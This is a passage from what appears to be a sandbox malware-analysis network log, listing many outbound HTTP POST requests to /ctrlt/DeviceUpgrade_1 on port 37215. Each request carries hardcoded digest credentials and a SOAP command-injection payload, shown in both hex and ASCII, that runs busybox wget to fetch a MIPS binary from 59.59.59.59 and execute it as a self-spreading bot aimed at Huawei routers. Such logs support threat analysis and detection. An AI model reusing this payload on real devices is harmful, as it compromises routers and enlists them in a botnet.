6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1983192.168.2.1559598197.224.34.7537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:19.018738985 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1984192.168.2.1540990197.8.210.23837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:19.018938065 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1985192.168.2.1533816197.182.72.14637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:19.019032001 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1986192.168.2.153658441.175.24.12937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:19.019068956 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1987192.168.2.1535422197.199.221.22637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:19.019099951 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1988192.168.2.1548666157.161.220.6737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:19.019210100 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1989192.168.2.1546780197.81.94.5337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:19.019243002 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1990192.168.2.1538406157.187.155.17237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:19.019273996 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1991192.168.2.1548924157.26.128.7237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:19.019309998 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1992192.168.2.155757641.134.6.2037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:19.025106907 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1993192.168.2.1533760197.109.150.537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:19.025166035 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
